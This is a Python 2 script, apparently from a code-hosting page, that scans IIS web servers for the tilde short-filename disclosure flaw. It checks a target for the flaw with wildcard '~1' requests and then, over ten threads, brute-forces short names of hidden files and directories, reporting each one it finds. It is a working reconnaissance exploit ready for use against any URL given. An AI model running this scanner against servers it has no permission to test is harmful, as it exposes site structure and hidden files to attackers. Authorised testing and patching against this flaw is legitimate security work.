代码拉取完成,页面将自动刷新
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141
# encoding=gbk
# An IIS short_name scanner my[at]lijiejie.com http://www.lijiejie.com
import sys
import httplib
import urlparse
import string
import threading
import Queue
import time
import string
class Scanner():
def __init__(self, target):
self.target = target
self.scheme, self.netloc, self.path, params, query, fragment = \
urlparse.urlparse(target)
if self.path[-1:] != '/': # ends with slash
self.path += '/'
self.payloads = list('abcdefghijklmnopqrstuvwxyz0123456789_-')
self.files = []
self.dirs = []
self.queue = Queue.Queue()
self.lock = threading.Lock()
self.threads = []
def _conn(self):
try:
if self.scheme == 'https':
conn = httplib.HTTPSConnection(self.netloc)
else:
conn = httplib.HTTPConnection(self.netloc)
return conn
except Exception, e:
print '[Exception in function _conn]', e
return None
# fetch http response status code
def _get_status(self, path):
try:
conn = self._conn()
conn.request('GET', path)
status = conn.getresponse().status
conn.close()
return status
except Exception, e:
raise Exception('[Exception in function _get_status] %s' % str(e) )
# test weather the server is vulerable
def is_vul(self):
try:
status_1 = self._get_status(self.path + '/*~1****/a.aspx') # an existed file/folder
status_2 = self._get_status(self.path + '/l1j1e*~1****/a.aspx') # not existed file/folder
if status_1 == 404 and status_2 == 400:
return True
return False
except Exception, e:
raise Exception('[Exception in function is_val] %s' % str(e) )
def run(self):
# start from root path
for payload in self.payloads:
self.queue.put( (self.path + payload, '****') ) # filename, extention
for i in range(10):
t = threading.Thread(target=self._scan_worker)
self.threads.append(t)
t.start()
def report(self):
for t in self.threads:
t.join()
self._print('-'* 64)
for d in self.dirs:
self._print('Dir: ' + d)
for f in self.files:
self._print('File: ' + f)
self._print('-'*64)
self._print('%d Directories, %d Files found in toal' % (len(self.dirs), len(self.files)) )
def _print(self, msg):
self.lock.acquire()
print msg
self.lock.release()
def _scan_worker(self):
while True:
try:
url, ext = self.queue.get(timeout=3)
status = self._get_status(url + '*~1' + ext + '/1.aspx')
if status == 404:
self._print('Found ' + url + ext + '\t[scan in progress]')
if len(url) - len(self.path)< 6: # enum first 6 chars only
for payload in self.payloads:
self.queue.put( (url + payload, ext) )
else:
if ext == '****': # begin to scan extention
for payload in string.ascii_lowercase:
self.queue.put( (url, '*' + payload + '**') )
self.queue.put( (url,'') ) # also it can be a folder
elif ext.count('*') == 3:
for payload in string.ascii_lowercase:
self.queue.put( (url, '*' + ext[1] + payload + '*') )
elif ext.count('*') == 2:
for payload in string.ascii_lowercase:
self.queue.put( (url, '*' + ext[1] + ext[2] + payload ) )
elif ext == '':
self.dirs.append(url + '~1')
self._print('Found Dir ' + url + '~1\t[Done]')
elif ext.count('*') == 1:
self.files.append(url + '~1.' + ext[1:])
self._print('Found File ' + url + '~1.' + ext[1:] + '\t[Done]')
except Exception,e:
break
if len(sys.argv) == 1:
print 'Usage: %s target' % sys.argv[0]
sys.exit()
target = sys.argv[1]
s = Scanner(target)
if not s.is_vul():
print 'Sorry, server is not vulerable'
sys.exit(0)
print 'server is vulerable, please wait, scanning...'
s.run()
s.report()
举报
请认真填写举报原因,尽可能描述详细。
请选择举报类型
误判申诉
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化